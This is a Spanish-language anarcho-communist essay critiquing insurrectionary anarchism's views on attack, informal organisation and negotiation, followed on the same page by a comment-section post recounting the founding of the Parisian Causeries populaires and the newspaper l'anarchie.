Que ese insurreccionalismo surgiera como una tendencia más distinguible en el anarquismo angloparlante en este período, tampoco debiera sorprendernos. El masivo rebrote que el anarquismo experimentó con los movimientos de protestas a los foros globalizadores fue en parte debido al gran grado de visibilidad de las tácticas del Bloque Negro. Luego de las protestas al Foro de Praga en el 2000, el Estado aprendió cómo reducir enormemente la efectividad de tales tácticas. Poco después de las desastrozas experiencias de Génova y de un número de Blooques controlados en los EEUU, surgieron argumentos que enfatizaban una mayor militancia y una organización de carácter más clandestino , por una parte, así como alejarse del espectáculo de las protestas en los foros, por otra.

A la vez, muchos jóvenes que entraban a la política anarquista por vez primera, frecuentemente, asumían de manera incorrecta que la imagen militante que les había llamado la atención por vez primera en las noticias, era producto del insurreccionalismo en particular. De hecho, la mayor parte de las variantes de anarquismo clasista, incluyendo los anarco-comunistas y sindicalistas revolucionarios, habían participado en protestas al estilo del Bloque Negro en estos foros. Como todas estas variantes consideran que la insurrección es una parte significativa para alcanzar la sociedad anarquista, no hay nada de sorprendente en que se hayan involucrado en un poco de lucha callejera en las ocasiones en que tales tácticas tenían sentido. Para el foro de Génova, cuando el Estado ya había, obviamente, aumentado los niveles represivos a su disposición, los anarco-comunistas debatían si tales tácticas tendrían futuro, en las columnas de revistas como ‘Red & Black Revolution’ y otras.

Las ideas del insurreccionalismo

Es probablemente de utilidad el aclarar ciertos mitos sobre el insurreccionalismo desde el comienzo. El insurreccionalismo no se limita a la lucha armada, pese a que pueda incluir la lucha armada, y la mayoría de los insurreccionalistas son bastante críticos del elitismo de las vanguardias armadas. Ni tampoco quiere decir que están constantemente tratando de comenzar insurrecciones; la mayoría de los insurreccionalistas son los bastante inteligentes como para darse cuenta de que el programa máximo no es siempre posible, aún cuando estén siempre dispuestos a condenar a otros anarquistas por esperar.

¿Qué es entonces el insurreccionalismo? “Do or Die” n.10, publicó una introducción útil[10], con el título de “Anarquismo Insurreccionalista: ¡Organizándonos para Atacar!”.[11] Usaré citas de manera sustantiva de esta artículo en la discusión que sigue.

El concepto de “ataque” está en el corazón de la ideología insurreccionalista, el cual se explica como sigue:

“El ataque es el rechazo de la mediación, de la pacificación, del sacrificio, de la acomodación, de tranzar en la lucha. Es mediante la acción y el aprendizaje para la acción, no mediante la propaganda, como abriremos el camino a la insurrección, pese a que el análisis y la discusión tengan un rol en la clarificación acerca del cómo actuar. Esperar sólo enseña a esperar; al actuar, se aprende a actuar”.

Este ensayo se basa en varios trabajos insurreccionalistas previamente publicados, uno de ellos “Con el Cuchillo Listo”, explica que:

“La fuerza de una insurrección es social, no militar. La rebelión generalizada no se mide con los encuentros armados, sino que con el grado en que la economía se paraliza, los lugares de producción y distribución son tomados, la circulación gratuita que consume a todo cálculo… Ningún grupo guerrillero, sin importar cuán efectivo sea, puede reemplazar a este movimiento grandioso de destrucción y transformación”.[12]

La noción insurreccionalista del ataque no se basa en una vanguardia que logre la liberación para la clase obrera. En cambio, están claros de que “a lo que el sistema teme, no es tanto a estos actos de sabotaje en sí, sino que a que se propaguen socialmente”.[13] En otras palabras, las acciones directas de pequeños grupos sólo pueden ser exitosas si son asumidas por la clase obrera. Esta es una manera más útil de discutir la acción directa que el debate más convencional de la izquierda que polariza en dos extremos, “grupos de acción directa”, que ven a sus acciones como objetivos en sí mismas, versus organizaciones revolucionarias que rechazan pasar de la propaganda para la acción de masas —y que frecuentemente, condenan las acciones de los grupos pequeños como “elitistas”.

Revueltas y lucha de clases

Los insurreccionalistas, frecuentemente, reconocen la lucha de clases donde la izquierda reformista se niega a verla. Escribiendo sobre la Inglaterra de comienzos de los 80, Jean Weir observaba que “las luchas que tienen lugar en los ghettos del centro, son frecuentemente malinterpretados como violencia vandálica. Los jóvenes que luchan contra la exclusión y el aburrimiento son elementos de avanzada del choque de clases. Los muros del ghetto deben caer, no reforzarse”.[14]

La idea de que tal tipo de acciones deban propagarse por toda la clase obrera, es también vista por los insurreccionalistas como una importante respuesta al argumento de que el Estado puede, simplemente, reprimir a los grupos pequeños. Se señala que “es materialmente imposible para el Estado y el Capital, controlar todo el terreno social”.[15]

Como podría imaginarse, los deseos individuales son centrales al insurreccionalismo, pero no como en el individualismo de la “derecha libertaria”. Más bien, “el deseo de la auto-determinación individual y de la auto-realización conlleva a la necesidad de un análisis de clase y a la lucha de clases”.[16]

La mayoría de la teoría insurreccionalista que hemos revisado hasta ahora no presenta, hasta ahora, ningún problema real de principios para los anarco-comunistas. A nivel teórico, los problemas surgen con la ideología organizativa que los insurreccionalistas han elaborado en paralelo. Gran parte de ésta, ha sido elaborada como una crítica ideológica hacia el resto del movimiento anarquista.

El organizador

La crítica insurreccionalista del “organizador”, si bien es útil para advertir de los peligros que surgen con tal rol, se ha expandido hasta ser una posición ideológica que presenta tales riesgos como inevitables. Se nos dice que “es la labor del organizador el transformar a la multitud en una masa controlable y representar a esa masa en los medios o las instituciones estatales” y “para el organizador… la acción real siempre debe estar en el último vagón para mantener la imagen ante los medios”.

Probablemente, la mayoría de nosotros estamos habituados a campañas de izquierda, conducidas por algún partido en particular, en donde exactamente esto que se ha descrito es lo que ocurre. Pero nuestra experiencia nos demuestra que tal cosa no es inevitable. Es bastante factible que individuos colaboren en la organización de una lucha sin que esto ocurra. Un camarada que tiene más tiempo que el resto, toma más tareas que deben ser llevadas a cabo —¿no es entonces un organizador?

El problema con esta aparente condena a priori de los “organizadores” es que no permite un análisis de qué hace que ocurra esta clase de problemas y, por consiguiente, como puede prevenirse tal cosa.

En el caso de los medios, no hay misterio. Cualquiera que haga trabajo mediático para una lucha controvertida, será bombardeado con preguntas acerca de la eventualidad de la violencia —en términos mediáticos, esta es una historia que “vende”. Si sufren de esto todos los días, todas las semanas, entonces comenzarán a amoldar la lucha en función de esta agenda de los medios.

La solución es simple. Este problema sucede porque la izquierda tiende a tener a sus “líderes”, que hacen el trabajo clave de organización en las protestas, también como el contacto mediático de la protesta. Nuestra experiencia muestra que, al dividirse los dos roles, cosa que los organizadores de un evento específico no sea la misma gente que habla a los medios, entonces este problema se reduce bastante, si no completamente. Los organizadores reales están aislados de los medios, pero transmiten toda la información a quien sea nominado como vocero ante los medios. Ese vocero ante los medios no tiene, sin embargo, voto en cuanto a la organización de la protesta.

Los medios y la opinión popular

Esto nos lleva a la definición insurreccionalista de los medios: “Una opinión no es algo que primero se dé en medio del público en general y que, luego, sea reproducido en los medios, como un simple reportaje de la opinión pública. Una opinión existe primero siempre en los medios. Luego, los medios reproducen la opinión un millón de veces asociando la opinión a ciertos tipos de personas (los conservadores piensan x, los liberales piensan y). La opinión pública se produce como una serie de simples elecciones o soluciones (‘Yo estoy a favor de la globalización y del libre comercio’ o ‘yo estoy a favor de mayor control nacional y del proteccionismo’). Se supone que todos debemos elegir —como elegimos líderes o hamburguesas— en lugar de pensar nosotros mismos”.

Esto suena bastante bien —y hay un grado considerable de verdad en esto. Pero este análisis generalizador, nuevamente, previene la discusión respecto a cómo superar estos problemas. Hasta la hora en que tengamos nuestros propios medios alternativos — y aún así, muchos de los problemas mencionados seguirán ocurriendo— estaríamos dementes si no usáramos aquellas secciones de los medios mediante los cuales podemos llegar a millones de personas a las cuales la falta de recursos nos impide llegar.

Y si bien los medios gustan de simplificar las historias reduciéndolas a elecciones binarias, esto no significa que todos los que reciben la información a través de estos medios aceptan esta división. Mucha, si es que no toda la gente, tiene cierta comprensión de que los medios no son perfectos y por tanto tienden a no aceptar estas divisiones binarias.

¿Esperando la revolución?

Se nos dice que la izquierda, en general, y el resto del movimiento anarquista, en particular, esperan.

“Una critica de separación y representación que justifica la espera y acepta el rol crítico. Con el pretexto de no separarse del ‘movimiento social’, se termina denunciando cualquier práctica de ataque como ‘arranque de tarros’ o como mera ‘propaganda armada’. Una vez más, los revolucionarios son llamados a ‘desenmascarar’ las reales condiciones de los explotados, esta vez por su propia inacción. No hay, por tanto, rebelión posible sino en un movimiento social visible. Entonces, todo quien actúe debe, necesariamente, querer suplantar al proletariado. El único patrimonio a defender pasa a ser la ‘crítica radical’, la ‘lucidez revolucionaria’. La vida es miserable, entonces, no se puede más que teorizar la miseria”.[17]

Aquí encontramos la principal debilidad del insurreccionalismo —su falta de discusión seria de otras tendencias anarquistas. Se nos quiere hacer creer que otros revolucionarios, incluyendo todos los otros anarquistas, favorecen el esperar mientras se predica sobre los males del capitalismo, en vez de tomar la acción. Hay algunos pocos grupos para quienes esto pueda ser cierto, pero la cierto es que, incluyendo al movimiento revolucionario no anarquista, la mayoría de las organizaciones se involucran en formas de acción directa cuando creen que éstas tienen sentido táctico. En realidad, este es un juicio que también hacen los insurreccionalistas —como todos los demás, reconocen la necesidad de esperar hasta el momento preciso. Ellos reconocen que mañana no será hora de tomar por asalto la Casa Blanca.

Crítica de la organización

Otro aspecto en el que afloran las fallas de la ideología insurreccionalista es cuando se trata de la cuestión de la organización. El insurreccionalismo se declara a sí mismo en contra de la “organización formal” y a favor de la “organización informal”. Frecuentemente esto no queda muy claro, ya que por organización “formal” se refieren como una chapa, simplemente, para todo lo que pueda salir mal en una organización.

Los insurreccionalistas intentan definir la organización formal como “organizaciones permanentes que sintetizan todas las luchas en una única organización, y organizaciones que median las luchas con la instituciones de dominación. Las organizaciones permanentes tienden a transformarse en instituciones que se erigen encima de la multitud en lucha. Tienden a desarrollar una jerarquía formal o informal y a quitar el poder a la multitud… La constitución jerárquica de las relaciones de poder remueve las decisiones del momento en que es necesario tomarlas y las ubica dentro de la organización… las organizaciones permanentes tienden a tomar decisiones sin basarse en las necesidades de algún objetivo o acción específico, sino que en las necesidades de la organización, especialmente, de su preservación. La organización se convierte en un fin en sí mismo”.

Si bien esta puede ser una buena crítica del leninismo o de las formas social-demócratas de organización, no describe, en realidad, las formas anarquistas de organización existentes —en particular, la organización anarco-comunista. Los anarco-comunistas, por ejemplo, no pretenden “sintetizar todas las luchas en una organización única”. Mas bien, creemos que la organización específicamente anarquista deben involucrarse en las luchas de la clase obrera, y estas luchas deben ser dirigidas por la misma clase —no dirigidas por una organización cualquiera, sea anarquista o no.

Soluciones para el problema de la organización

Lejos de desarrollar las jerarquías, nuestra constitución no sólo prohíbe la jerarquía formal, sino que además contiene previsiones diseñadas para prevenir la emergencia de jerarquías informales. Por ejemplo, un considerable poder informal puede recaer sobre quien sea el único que pueda desarrollar algún tipo de tarea particular y que esté en esa posición durante varios años. Por esto, la constitución del WSM dice que ningún miembro puede permanecer en un cargo particular por más de tres años. Pasado ese tiempo, deben abandonar el cargo.

Esta clase de mecanismos formales para prevenir el desarrollo de jerarquías informales, son comunes en las organizaciones anarco-comunistas. De hecho, es un ejemplo de que la organización formal es una mayor protección en contra de la jerarquía, ya que nuestro método de organización formal también nos permite acordar reglas para prevenir el desarrollo de las jerarquías informales. El insurreccionalismo carece de una crítica seria de las jerarquías informales pero, como cualquiera activo en el movimiento anarquista en el mundo angloparlante lo sabe, la falta de organizaciones formales de alguna envergadura significa que los problemas de jerarquía en el movimiento son más que nada, problemas de jerarquía informal.

Si dejamos de lado todo aquello que es una desviación en la organización, entonces, el concepto insurreccionalista de organización “formal” se reduce a una organización que permanece entre y a lo largo de las luchas. Pero incluso en estas circunstancias su distinción se obscurece, pues los insurreccionalistas también preven que, a veces, las organizaciones informales puedan involucrarse en más de una lucha, o pasar de una lucha a la siguiente.

Desde una perspectiva anarco-comunista, el mayor fuerte de una organización, es que ayuda a crear comunicación, objetivos comunes y unidad entre y a lo largo de las luchas. No en el sentido formal de que todas las luchas sean forzadas en un programa y bajo un único mando. Sino que en el sentido informal de que la organización anarco-comunista actúe como un canal de comunicación, movimiento y debate entre las luchas que permite una mejor comunicación y aumenta, así, las posibilidades de la victoria.

La alternativa insurreccionalista —la organización informal

El método de organización favorecido por los insurreccionalistas se orienta según el principio de que “el mínimo de organización necesario para alcanzar nuestros objetivos es siempre lo mejor para maximizar nuestros esfuerzos”. Lo que esto significa es pequeños grupos de compañeros que se conocen bien y que tienen bastante tiempo disponible entre ellos para discutir diversas cuestiones o la acción —es decir, grupos de afinidad.

Se nos dice que “tener una afinidad con un camarada significa conocerle, haber profundizado el conocimiento sobre él. En la medida en que ese conocimiento crezca, la afinidad se acrecienta al punto de hacer la acción conjunta posible”.[18]

Por supuesto, los insurreccionalistas saben que los grupos pequeños son frecuentemente demasiado pequeños como para alcanzar un objetivo propio, y por ello plantean que estos grupos pueden federarse temporalmente para alcanzar un fin específico.

Ha habido intentos de extender esto a un plano internacional.

“La Internacional Insurreccionalista Anti-Autoritaria tiene por fin ser una organización informal… que se basa, por tanto, en la profundización progresiva del conocimiento recíproco de todos sus adherentes… para este fin, todos los adherentes deben enviar documentación que consideren necesaria para hacer su actividad conocida… al grupo promotor”.[19]

Los núcleos autónomos de base.

Es obvio que una revolución libertaria exitosa requiere de una masa de gente organizada. Los insurreccionalistas admiten esto, y han intentado construir modelos de organización de masas que se ajusten a sus principios ideológicos. Los núcleos autónomos de base, como se les llama, se basan originalmente en el Movimiento Autónomo de Obreros Ferroviarios de Turín y las ligas autogestionadas en contra de la base de misiles de Comiso.

Alfredo Bonnano en “La Tensión Anarquista”, describió la experiencia de Comiso de la siguiente manera: “un modelo teórico de esta naturaleza fue usado a fin de prevenir la construcción de la base de misiles norteamericana de Comiso a comienzos de los 80s. Los anarquistas que intervinieron durante dos años, formaron ‘ligas autogestionadas’”.[20]

Él las describe así, “Estos grupos no debieran estar compuestos exclusivamente de anarquistas. Todos quienes pretendan luchas para alcanzar los objetivos dados, incluso objetivos circunscritos, pueden participar siempre y cuando tomen en cuenta algunas condiciones esenciales. Primero que nada, el ‘conflicto permanente’, esto es, grupos que se caractericen en atacar la realidad en que se encuentran, sin esperar órdenes externas. Luego, la característica de ser ‘autónomos’, esto es, que no dependan ni tengan relaciones de ninguna clase con los partidos políticos o las organizaciones sindicales. Finalmente, que enfrenten a los problemas uno por uno, y que no propongan plataformas con demandas genéricas que inevitablemente terminarían transformándose en administradores, como un mini-partido o como una diminuta alternativa a los sindicatos”.[21]

Por más que tengan el título de autogestionadas, estas ligas, de hecho, se parecen mucho a los referentes usados para vincular y controlar las luchas sociales de diversas organizaciones leninistas. ¿Por qué? Pues porque la definición entregada es de una organización que, a la vez que busca organizar a las masas, lo hace según los lineamientos definidos por los grupos informales de anarquistas. De ser verdaderamente autogestionada, ciertamente, sería la misma Liga la que definiría su método de operación y qué cuestiones serían en torno a las cuales lucharía. Pero desde los inicios, la Liga excluye no sólo a todas las otras organizaciones que pudieran hacer la competencia, sino que incluso, las relaciones con partidos politicos u organizaciones sindicales. Insistimos, cualquier lucha realmente autogestionada, decidirá ella misma con quien mantener relaciones y no seguirá, sencillamente, los dictados de una minoría ideológica organizada.

Otro insurreccionalista, O.V., define a las ligas como “el elemento que vincula a la organización específica informal anarquista a las luchas sociales”, y dice de ellas, “los ataques son organizados por los núcleos, en colaboración con las estructuras específicas anarquistas que proveen del apoyo práctico y teórico, desarrollando la búsqueda de los medios requeridos para la acción, señalando las estructuras y los individuos responsables de la represión, y ofreciendo un mínimo de defensa en contra de los intentos de recuperación política o ideológica del poder o en contra de la represión pura y simple”.[22]

En todo caso, esto termina siendo peor —las estructuras anarquistas específicas reciben el rol de determinar ellas mismas cualquier decisión significativa para la Liga. Esto convierte en un sinsentido cualquier declaración sobre autogestión y transforma a tal liga en una criatura manipulada por cuadros autoproclamados de auténticos revolucionarios, supuestamente, capaces de tratar con aquellas cuestiones que los otros miembros no pueden. Esto parece contradecir tanto lo que los insurreccionalistas predican, que es necesario que nos detengamos a considerar por qué terminan en semejante posición.

La cuestión del acuerdo

La razón subyace en el hecho de que la acción común precisa, obviamente, de un cierto nivel de acuerdo en común. La aproximación insurreccionalista a esto, es muy difícil de comprender, y es la razón por la cual tan curiosas contradicciones emergieron en las ligas autogestionadas defendidas por ellos. El problema es que para alcanzar acuerdo, se requiere de tomar decisiones, y en el proceso de tomar decisiones, se abre la posibilidad de que una decisión mayoritaria contravenga lo que piensan los cuadros informales.

El artículo de ”Do or Die” intenta definir este evidente problema de la siguiente manera: “la autonomía permite que se tomen decisiones cuando sea necesario, en vez de predeterminarlas o retrasarlas con las decisiones de un comité o de una asamblea. Esto no significa , sin embargo, que no debiéramos pensar estratégicamente acerca del futuro ni tener acuerdos o planes. Al contrario, los planes y acuerdos son útiles e importantes. Lo que enfatizamos, es la flexibilidad que permita a la gente el desembarazarse de los planes, cuando éstos se vuelvan inútiles. Los planes debieran ser adaptables a los eventos en la medida en que se desencadenan”.

Esto nos plantea más interrogantes que lo que intentaba responder —¿cómo es posible planificar sin predeterminar algo?, si un grupo de gente piensa estratégicamente acerca del futuro ¿no ese grupo, entonces, un comité o una asamblea, aunque no utilice tal nombre? ¿hay realmente quien se empecine con planes que no sean adaptables en la medida en que los eventos se desencadenen?

Desde una perspectiva anarco-comunista, el punto del pensamiento estratégico acerca del futuro, es utilizar ese pensamiento para la planificación a futuro. Los planes requieren de la toma de decisiones por adelantado —predeterminadamente, por lo menos hasta cierto punto. Y los planes deben ser acordados y elaborados formalmente, lo que, ciertamente, implica asambleas y, posiblemente, reuniones de algún comité. ¿Para qué negar todo esto?

Negociación

Al igual que los más ideologizados anarco-sindicalistas, los insurreccionalistas toman una posición ideológica en contra de las negociaciones. “Los compromisos sólo hacen al Estado y al Capital más fuertes”, nos dicen. Pero esta consigna sólo funciona cuando se es un grupo reducido sin ninguna influencia sobre las luchas. A menos que sea en un contexto revolucionario, resulta inusual ganar de lleno una lucha; por tanto, si queremos que a nuestras ideas se les ponga atención, una y otra vez, nos veremos enfrentados, ora a una victoria limitada, y consecuentemente, negociada, o arriesgamos la derrota en las puertas de la victoria, por plantear la lucha más allá de lo que sabemos puede obtenerse. Ciertamente, nuestro objetivo ha de ser ganar todo cuanto nos sea posible, ¿o ha de ser sucumbir en gloriosas derrotas?

Aparentemente para ellos, la cuestión no sería ganar. Un insurreccionalista, entusiasta, describe cómo “los obreros que, durante una huelga ilegal, llevaban un cartel que decía, ‘No pedimos nada’, comprendían que la derrota está implícita en su reclamo”.[23] Esto sólo tiene sentido si los obreros en cuestión ya son revolucionarios. Si esta es una lucha social , digamos, por reducción en las rentas o por un aumento de salarios, tal cartel es un insulto a las necesidades de los que están luchando.

A menos que sea durante la revolución, la cuestión no es si negociar o no negociar, sino mas bien, quién negocia, con qué mandato y sujeto a qué procedimientos. La realidad es que, de evadirse estas cuestiones, el vacío resultante será llenado por los autoritarios, quienes estarán felices de negociar en sus términos, de manera de minimizar su responsabilidad ante las bases.

Represión y debate

Sin entrar en los detalles de cada controversia, un problema grave en todos los países en donde los insurreccionalistas llevan sus palabras a los hechos, es que frecuentemente esto significa ataques que logran poco o nada, excepto proveer de una excusa para la represión estatal y aislar al conjunto de los anarquistas, no sólo a aquellos responsables, del movimiento social más amplio.

Los insurreccionalistas plantean estar abiertos a debatir tácticas, pero la realidad de la represión estatal significa que, en la práctica, cualquier crítica de esas acciones sea presentada como alinearse con el Estado. Casi hace 30 años, Bonnano intentó definir a todos los que piensan que tales acciones son prematuras o contra-productivas como partidarios del Estado, cuando escribió en el “Placer Armado” que,

“Cuando decimos que el tiempo no ha llegado para atacar con las armas al Estado, estamos abriendo las puertas del manicomio para aquellos camaradas que realizan tales acciones; cuando decimos que no ha llegado la hora de la revolución, estamos ajustando la camisa de fuerza, cuando decimos que, objetivamente, tales acciones son una provocación, ponemos su traje blanco a los torturadores”.[24]

La realidad es que, muchas de las acciones adjudicadas por los insurreccionalistas, no están más allá de las críticas —y si a los trabajadores no se les permite criticar tales acciones, ¿no quedan entonces reducidos al rol de meros observadores pasivos en una lucha entre el Estado y la minoría revolucionaria? Si, como nos dice Bonnano implícitamente, no se pudiera criticar aún las más descabelladas de las acciones, entonces, no hay ninguna clase de discusión táctica.

Hacia una teoría anarco-comunista

Los anarquistas comunistas han adoptado una aproximación diferente para probar la cordura de alguna accion militante. Esta significa que, cuando se dice actuar a favor de algún grupo en particular, entonces hay primero que demostrar que este grupo está de acuerdo con la clase de tácticas que se proponen utilizar. Esta cuestión es mucho más importante para la práctica anarquista que la cuestión de si lo que algún grupo anarquista decide es una táctica apropiada o no.

Como hemos visto, los anarco-comunistas no tienen objeciones de principio hacia las insurrecciones, ya que nuestro movimiento se ha forjado en una tradición de insurrecciones y se ha inspirado en muchos de los protagonistas de tales insurrecciones. En el presente, continuamos desafiando las limitaciones que el Estado busca imponer a la protesta cuando esto conlleva llevar las luchas hacia adelante. Pero insistimos, este no es un juicio que nos corresponde a nosotros tomar solos —en casos en que planteamos solidarizar con algún grupo (ej, trabajadores en huelga), debe ser entonces ese grupo el que dicte los limites de las tácticas que se puedan usar en sus luchas.

El insurreccionalismo ofrece una crítica útil de bastante de lo que ha sido una práctica común en la izquierda. Pero, falazamente, intenta extender tal crítica a todas las formas de organización anarquista. Y en ciertos casos, las soluciones propuestas para superar problemas reales de la organización resultan peores que los problemas que se proponían resolver. Los anarco-comunistas, ciertamente, pueden encontrar los textos insurreccionalistas instructivos, pero la solución a los problemas de la organización revolucionaria no serán encontrados en ellos.

[1] John M Hart’s «Anarchism and the Mexican Working Class».

[2] James Joll, The Anarchists, 229.

[3] Agradezco a Pepe por la información en los eventos de Argentina y Chile.

[4] Revisar los números 8 y 10 de Hombre y Sociedad (N. del E.).

[5] Organisational Platform of the Libertarian Communists, Dielo Trouda (Workers’ Cause), 1926 ver [[http://struggle.ws/platform/plat_preface.html][http://struggle.ws/platform/plat_preface.html]]

[6] Jaime Balius (secretario de los Amigos de Durruti), Hacia una Nueva Revolución, ver [[http://struggle.ws/fod/towardsintro.html][http://struggle.ws/fod/towardsintro.html]]

[7] Hacia una Nueva Revolución.

[8] For an Anti-authoritarian Insurrectionist International-Proposal for a Debate, Anti-authoritarian Insurrectionalist International, (Promoting Group), Elephant Editions 1993 ver [[http://www.geocities.com/cordobakaf/inter.html][http://www.geocities.com/cordobakaf/inter.html]]

[9] Andy en respuesta a una versión preliminar de este artículo en el foro anti-politics, ver [[http://www.anti-politics.net/forum/viewtopic.php?t=1052][http://www.anti-politics.net/forum/viewtopic.php?t=1052]]

[10] La cual contiene, sin embargo, un error básico, el de describir, curiosamente a la Federación Anarquista Italiana sintetista como “una organización plataformista”, lo que sugiere que los autores hicieron nulo o muy poco esfuerzo por comprender lo que el plataformismo es antes de rechazarlo.

[11] Do or Die 10, 2003, online at [[http://www.eco-action.org/dod/no10/anarchy.htm][http://www.eco-action.org/dod/no10/anarchy.htm]]

[12] Anon., At Daggers Drawn with the Existent, its Defenders and its False Critics, Elephant Editions ver [[http://www.geocities.com/kk_abacus/ioaa/dagger.html][http://www.geocities.com/kk_abacus/ioaa/dagger.html]]

[13] Do or Die 10 , «Insurrectionary Anarchism and the Organization of Attack».

[14] J.W., Insurrection, online at [[http://www.geocities.com/kk_abacus/insurr5.html][http://www.geocities.com/kk_abacus/insurr5.html]]

[15] Do or Die 10 , «Insurrectionary Anarchism and the Organization of Attack».

[16] Do or Die 10 , «Insurrectionary Anarchism and the Organization of Attack».

[17] Anon., At Daggers Drawn with the Existent, its Defenders and its False Critics, Elephant Editions ver [[http://www.geocities.com/kk_abacus/ioaa/dagger.html][http://www.geocities.com/kk_abacus/ioaa/dagger.html]]

[18] O.V.,Insurrection, online at [[http://www.geocities.com/kk_abacus/insurr3.html][http://www.geocities.com/kk_abacus/insurr3.html]]

[19] For An Anti-authoritarian Insurrectionalist International, Elephant Editions 1993 ver [[http://www.geocities.com/kk_abacus/ioaa/insurint.html][http://www.geocities.com/kk_abacus/ioaa/insurint.html]]

[20] Alfredo Bonanno, The Anarchist Tension, Original, La Tensione anarchica. Traducido por Jean Weir, 1996, ver [[http://www.geocities.com/kk_abacus/ioaa/tension.html][http://www.geocities.com/kk_abacus/ioaa/tension.html]]

[21] Alfredo Bonanno, The Anarchist Tension, Original, La Tensione anarchica. Traducido por Jean Weir, 1996, vert [[http://www.geocities.com/kk_abacus/ioaa/tension.html][http://www.geocities.com/kk_abacus/ioaa/tension.html]]

[22] O.V.,Insurrection, ver [[http://www.geocities.com/kk_abacus/insurr2.html][http://www.geocities.com/kk_abacus/insurr2.html]]

[23] Anon., At Daggers Drawn with the Existent, its Defenders and its False Critics, Elephant Editions ver [[http://www.geocities.com/kk_abacus/ioaa/dagger.html][http://www.geocities.com/kk_abacus/ioaa/dagger.html]]

[24] Alfredo Bonanno, Armed Joy, Traducido por Jean Weir, Original, La gioia armata, 1977 Edizioni Anarchismo, Catania, 1998 Elephant Editions, Londres ver [[http://www.geocities.com/kk_abacus/ioaa/a_joy.html][http://www.geocities.com/kk_abacus/ioaa/a_joy.html]]

75 comentarios

Actividad anarquista

Publicada el 22/09/2018 por Anonymous Chile

Leía yo con atención el artículo de Robert Delon y comprendía todo su alcance. Es, en efecto, el método uno de los más seguros auxiliares de la razón, uno de los mejores apoyos a la propaganda. Pensaba entonces en echar un vistazo retrospectivo al trabajo de estos últimos años. No quiero —puesto que considero el trabajo de gran utilidad— entrar hoy en el detalle de nuestros esfuerzos. Un simple vistazo tan solo.

Después de la propaganda de orden negativo que habíamos puesto en marcha por todo París, algunos amigos y yo decidimos, sin interrumpirla, comenzar una propaganda de orden positivo. Habíamos adquirido y mantenido para la primera de ellas un espíritu metódico que nos pareció debíamos conservar al comenzar la segunda. Solo después de haber afrontado toda la dificultad del trabajo positivo, decidimos ponerlo en marcha.

¿Hacia dónde nos encaminaríamos? Hacia dónde nos encaminamos todos nosotros, anarquistas, si no es hacia esa tierra comunista en la que nuestros individualismos podrían afirmarse? ¿Hacia dónde me encaminaba yo mismo, rabelesiano, si no es hacia esa abadía de Thelema[1] sobre cuya entrada resplandece el famoso «Haz lo que quieras»? Pero de inmediato comprendimos que no se fabrica a voluntad, con un golpe de varita mágica, un medio semejante, ni a los hombres que deben vivir en él.

Celosos del éxito y, en consecuencia, de asumir el buen método, comprendimos que no había que poner el carro delante de los bueyes y comenzamos, en octubre de 1902, a formar las *Causeries populaires*, agrupación anarquista —sin cotización, sin estatutos, sin inscripción—, que debía ayudarnos a reunir a los individuos.

Al principio, nuestras primeras asambleas tuvieron lugar en la trastienda de una vinatería. Allí esperamos pacientemente conseguir un núcleo lo bastante fuerte como para asegurar la vitalidad del grupo, así como reunir los primeros fondos para alquilar un local en el que pudiéramos liberarnos de casi todas las promiscuidades. Esto ocurrió en octubre de 1903, un año después.

Entretanto, sabiendo de la utilidad de tener varios centros, formábamos en Montmartre, en junio de 1904, gracias a la buena marcha del primero. En el distrito 13 y sobre las mismas bases, amigos nuestros formaban otra *Causerie*, que también se hizo con un local pasados seis meses.

Fue entonces cuando se volvió necesario, cuando se impuso la necesidad del órgano que reuniría a todos esos núcleos, a todos esos centros, y a otros núcleos, otros centros, que no habrían de dejar de surgir en provincias, o incluso uniría a ciertas individualidades con las susodichas agrupaciones.

¡Cómo actuar? ¡Siempre con el mismo método! Solicitamos, para empezar, un gran esfuerzo de aquellos que estaban interesados. Buscamos oportunidades, hojeamos publicaciones y, para hacer nuestro periódico, quisimos, antes que nada, tener una imprenta.

Ya en noviembre de 1904, las *Causeries populaires* podían elaborar pequeños manifiestos. En abril de 1905 aparecía el primer número de *l’anarchie*.[2] Organizábamos nosotros mismos la publicidad de nuestras conferencias y podíamos permitirnos la aparición de carteles y folletos.

Pero ¿duraría este ensayo? ¿Encontraría, entre tantas dificultades, fuerza para vivir? Sí. En abril de 1906, un año de existencia nos lo demostraba, y entonces decidimos completar el material de imprenta. El material era mucho. En julio de 1906 hicimos un llamamiento a nuestros camaradas, a aquellos que comprenden la forma de nuestra propaganda, para establecer, sobre bases sólidas, la imprenta de las *Causeries populaires*.

Unos pocos días más, incluso, si fuera necesario, hasta finales de año, y el trabajo estará hecho. Entonces comenzaremos con la escuela, la continuación lógica de nuestro trabajo. Trabajaremos para alcanzar mediante la escuela «anarquista» a los individuos menos aplastados, menos contaminados por el ambiente, más sanos y más fuertes. Desde ahora estudiamos los medios materiales el intelectuales que deberán asegurar su buena vitalidad.

Y solo cuando también esta experiencia haya conocido el éxito, creeremos tener los elementos necesarios para la formación de un medio libre o, mejor dicho, será entonces cuando se imponga por sí mismo, metódicamente. Desde la unidad habremos llegado al todo, desde el individuo al medio. Encontramos malas las demás formas de proceder y, para probarlo, empleamos el método contrario. Eso es todo.

Que no se nos suba a la cabeza también a nosotros; nos encontramos en el establecimiento casi definitivo de la imprenta de las *Causeries populaires*, para el cual aún tenemos necesidad de vosotros, camaradas. No levantemos castillos en el aire; velemos, de momento, por nuestro humilde chamizo.

A propósito de la imprenta, terminaré casi con un *post-scriptum*. Algunos imbéciles, que no pueden ver cómo se trabaja a su rededor sin sentirse fatigados, cacarean, dan vueltas y más vueltas, os escriben largas cartas incluso. «¿Qué significan vuestra tentativa y la tentativa de Girault[3]-Lorulot?[4] ¡Os estáis haciendo la competencia! ¿Adónde vais? ¿Cómo vais a triunfar? ¡Todo eso son celos individuales! ¿Por qué no os asociáis?» Descansad, oh fatigados. Por mucha tarea que haya, no será cosa vuestra. Al levantaros, al acostaros, estáis siempre cansados. Pero, de todos modos, ahí van algunas explicaciones.

